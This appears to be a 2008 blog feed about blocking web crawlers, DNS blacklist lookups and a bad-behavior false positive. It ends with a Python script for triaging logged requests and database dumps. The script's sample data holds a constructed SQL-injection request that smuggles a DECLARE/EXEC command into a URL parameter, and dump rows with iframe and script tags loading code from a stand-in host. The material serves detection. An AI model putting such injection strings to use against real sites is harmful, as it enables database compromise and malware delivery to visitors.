AideRSS just does not get it that they have been blocked.<br />67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com <br />[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com <br />[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com <br />[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com <br 
/>[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com <br />[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com <br />[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com <br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com<br />Agent: AideRSS/1.0 (aiderss.com); * subscribers <br />67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com <br /><br /><br />Update <br /><br />67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam<br />67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam<br /><br /><br />The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/<br />It was added to the list: Tue Apr 1 12:41:39 2008 EST<br /><br />spam source means the system was found via manual spam header parsing to be the origin of spam.<br /><br />Update July 15th <br />Agent: firefox/2.0.0.6 (ubuntu-feisty) <br />72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com
tag:blogger.com,1999:blog-33923218.post-4522603801355587183 2008-06-17T12:57:00.002-05:00 2008-06-17T13:08:59.180-05:00
openrbl.org is gone
openrbl.org is down and I need a replacement that can do a lookup on all of the block lists and do a DNS lookup. <br /><br />I did find a replacement of sorts. 
Change the admin.php $dns_lookup setting to:<br /><br />$dns_lookup ="http://www.robtex.com/rbl/";<br /><br /><br />If anyone knows of one please post it.
tag:blogger.com,1999:blog-33923218.post-1432536090658230359 2008-06-06T12:44:00.000-05:00 2008-06-06T12:44:28.865-05:00
Request contained a malicious JavaScript or SQL injection attack
bad-behavior is now blocking what it says is a SQL injection but all it's really looking for is a # in the header. So I end up seeing crap like this.<br /><br />I think this may be a bug in bad behavior.<br /><br />Update: I am still seeing this from the Yahoo bot<br /><br />403 Request contained a malicious JavaScript or SQL injection attack <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.8.122 llf520018.crawl.yahoo.net <br /><br />403 Request contained a malicious JavaScript or SQL injection attack <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.17.186 llf520164.crawl.yahoo.net <br /><br />403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com <br />Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) <br />74.6.22.159 llf520079.crawl.yahoo.net <br /><br /><br /><br /> // Broken spambots send URLs with various invalid characters<br /> // Some broken browsers send the #vector in the referer field :(<br /> if (strpos($package['request_uri'], "#") !== FALSE) {<br /> return "dfd9b1ad";<br /> }
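For the DECLARE/CAST injection post of 2008-08-22 above: an added example, not code from this blog or from M&M Autoban, that URL-decodes a logged request, unwraps the CAST(0x...) hex so the hidden SQL can be read during triage, and scans a database dump for injected iframe/script tags as that post advises. The request path `page.asp`, the dump rows and the `injected.example` host are constructed sample data.

```python
import re
from urllib.parse import unquote

# CAST(0x<hex> AS CHAR(n)) wrapper, as it appears after URL-decoding.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-F]+)\s+AS\s+N?(?:VAR)?CHAR", re.I)
# iframe/script tags carrying a src attribute, the markup planted in text columns.
INJECTED = re.compile(r"<\s*(iframe|script)\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def decode_cast_payload(request_target):
    """Return the SQL hidden inside CAST(0x..) in a logged request, else None."""
    decoded = unquote(request_target)
    match = CAST_HEX.search(decoded)
    if not match or "EXEC" not in decoded.upper():
        return None
    hex_blob = match.group(1)
    if len(hex_blob) % 2:  # odd length means the log line was truncated
        hex_blob = hex_blob[:-1]
    return bytes.fromhex(hex_blob).decode("latin-1")

def scan_dump(dump_text):
    """Return (line_no, tag, src) for each iframe/script tag found in a SQL dump."""
    hits = []
    for line_no, line in enumerate(dump_text.splitlines(), 1):
        for tag, src in INJECTED.findall(line):
            hits.append((line_no, tag.lower(), src))
    return hits

# Constructed sample data: a harmless stand-in for the hex body, not a captured
# payload; page.asp and injected.example are hypothetical names.
SAMPLE_SQL = "DECLARE @T VARCHAR(255) -- constructed placeholder body"
SAMPLE_REQUEST = ("/page.asp?id=1;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
                  + SAMPLE_SQL.encode("ascii").hex().upper()
                  + "%20AS%20CHAR(4000));EXEC(@S);")
SAMPLE_DUMP = (
    "INSERT INTO news VALUES (1,'Spring sale starts Monday');\n"
    "INSERT INTO news VALUES (2,'Hours<iframe src=\"http://injected.example/x\" width=0></iframe>');\n"
    "INSERT INTO news VALUES (3,'Contact<script src=http://injected.example/b.js></script>');\n"
)

if __name__ == "__main__":
    print("hidden SQL:", decode_cast_payload(SAMPLE_REQUEST))
    print("benign URL:", decode_cast_payload("/podcast/declare.html"))
    for hit in scan_dump(SAMPLE_DUMP):
        print("dump hit:", hit)
```

Matching on the whole wrapper rather than the bare words CAST or DECLARE keeps ordinary URLs such as `/podcast/declare.html` from being flagged.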